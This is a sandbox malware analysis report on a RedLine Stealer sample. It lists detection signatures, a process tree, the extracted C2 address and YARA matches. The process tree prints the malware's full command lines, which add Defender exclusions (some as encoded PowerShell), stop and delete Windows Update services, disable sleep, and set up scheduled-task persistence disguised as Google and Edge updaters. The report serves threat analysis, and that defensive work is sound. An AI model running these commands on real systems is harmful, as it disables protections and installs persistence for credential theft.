Edit tour

Windows Analysis Report
6iWK0k820U.exe

Overview

General Information

Sample Name:	6iWK0k820U.exe
Analysis ID:	753184
MD5:	314e1e071f0664e0a39093313b394633
SHA1:	bfa37bd268633c93d49736e5e967cd56d7d0c815
SHA256:	fc45095af85b3699290055b3bf12cdeba82dbb6c70187351df253a735695f4bf
Tags:	exeRedLineStealer
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Detected unpacking (overwrites its own PE header)

Sigma detected: Stop multiple services

Detected unpacking (changes PE section rights)

Antivirus detection for dropped file

Snort IDS alert for network traffic

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Uses cmd line tools excessively to alter registry or file data

Encrypted powershell cmdline option found

Machine Learning detection for sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Contains functionality to inject code into remote processes

Tries to detect virtualization through RDTSC time measurements

Adds a directory exclusion to Windows Defender

Drops executables to the windows directory (C:\Windows) and starts them

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Uses powercfg.exe to modify the power settings

Sample uses process hollowing technique

Modifies power options to not sleep / hibernate

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

Found hidden mapped module (file has been removed from disk)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Sleep loop found (likely to delay execution)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Uses reg.exe to modify the Windows registry

PE file contains more sections than normal

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Creates files inside the system directory

PE file contains sections with non-standard names

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Is looking for software installed on the system

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Detected TCP or UDP traffic on non-standard ports

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

6iWK0k820U.exe (PID: 5796 cmdline: C:\Users\user\Desktop\6iWK0k820U.exe MD5: 314E1E071F0664E0A39093313B394633)

conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

vbc.exe (PID: 5980 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)

brave.exe (PID: 6104 cmdline: "C:\Users\user\AppData\Local\Google\brave.exe" MD5: 9253ED091D81E076A3037E12AF3DC871)

powershell.exe (PID: 3956 cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 1112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1536 cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 2620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 2432 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 5940 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 1800 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 5388 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 1920 cmdline: sc stop dosvc MD5: D79784553A9410D15E04766AAAB77CD6)

reg.exe (PID: 1756 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 4280 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 2436 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 3100 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: E3DACF0B31841FA02064B4457D44B357)

cmd.exe (PID: 4536 cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powercfg.exe (PID: 5684 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 5944 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 2364 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 4008 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powershell.exe (PID: 5296 cmdline: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' } MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ofg.exe (PID: 4820 cmdline: "C:\Users\user\AppData\Local\Google\ofg.exe" MD5: 33DAD992607D0FFD44D2C81FE67F8FB1)

schtasks.exe (PID: 4704 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 1332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

chrome.exe (PID: 5400 cmdline: "C:\Users\user\AppData\Local\Google\chrome.exe" MD5: 8CD1EA50F8F4C45055400E70DA52B326)

powershell.exe (PID: 5508 cmdline: powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 4780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 5200 cmdline: powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 3732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 4252 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 4956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 1304 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

GoogleUpdate.exe (PID: 5752 cmdline: C:\Windows\GoogleUpdate.exe MD5: 9A66A3DE2589F7108426AF37AB7F6B41)

GoogleUpdate.exe (PID: 4968 cmdline: C:\Windows\GoogleUpdate.exe MD5: 9A66A3DE2589F7108426AF37AB7F6B41)

GoogleUpdate.exe (PID: 1952 cmdline: C:\Windows\GoogleUpdate.exe MD5: 9A66A3DE2589F7108426AF37AB7F6B41)

WerFault.exe (PID: 6072 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 232 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

ofg.exe (PID: 4272 cmdline: C:\Users\user\AppData\Local\Google\ofg.exe MD5: 33DAD992607D0FFD44D2C81FE67F8FB1)

schtasks.exe (PID: 2576 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

chrome.exe (PID: 5276 cmdline: C:\Users\user\AppData\Local\Google\chrome.exe MD5: 8CD1EA50F8F4C45055400E70DA52B326)

powershell.exe (PID: 5616 cmdline: powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)

chrome.exe (PID: 688 cmdline: C:\Users\user\AppData\Local\Google\chrome.exe MD5: 8CD1EA50F8F4C45055400E70DA52B326)

cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["37.220.87.2:27924"], "Authorization Header": "a7c56867dbb5e7f508f946ee45b6a729"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Google\ofg.exe	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.254324630.000000000041C000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000000.253928530.000000000041C000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000003.252173765.0000000000522000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 6iWK0k820U.exe PID: 5796	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: vbc.exe PID: 5980	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: vbc.exe PID: 5980	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.6iWK0k820U.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.6iWK0k820U.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x16f4c:$s5: delete[] 0x167f8:$s6: constructor or from DllMain. 0x1a470:$pat14: , CommandLine: 0x32a3d:$v2_1: ListOfProcesses 0x327d1:$v4_3: base64str 0x33840:$v4_4: stringKey 0x30418:$v4_5: BytesToStringConverted 0x2f480:$v4_6: FromBase64 0x30be0:$v4_8: procName 0x30f63:$v5_1: DownloadAndExecuteUpdate 0x326e1:$v5_2: ITaskProcessor 0x30f51:$v5_3: CommandLineUpdate 0x30f42:$v5_4: DownloadUpdate 0x315e4:$v5_5: FileScanning 0x30787:$v5_7: RecordHeaderField 0x301a6:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
53.0.GoogleUpdate.exe.1b0000.0.unpack	SUSP_Unsigned_GoogleUpdate	Detects suspicious unsigned GoogleUpdate.exe	Florian Roth	0x16ac5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16dd5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x170b1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x173a1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17691:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17995:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17c81:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17f79:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18279:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18561:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18849:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18b31:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18e35:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19141:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1943d:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19739:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19a29:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19d35:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a025:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a305:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a611:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ...
50.0.GoogleUpdate.exe.1b0000.0.unpack	SUSP_Unsigned_GoogleUpdate	Detects suspicious unsigned GoogleUpdate.exe	Florian Roth	0x16ac5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16dd5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x170b1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x173a1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17691:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17995:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17c81:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17f79:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18279:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18561:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18849:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18b31:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18e35:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19141:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1943d:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19739:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19a29:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19d35:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a025:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a305:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a611:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ...
21.0.ofg.exe.f80000.0.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute
17.2.ofg.exe.f80000.2.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute
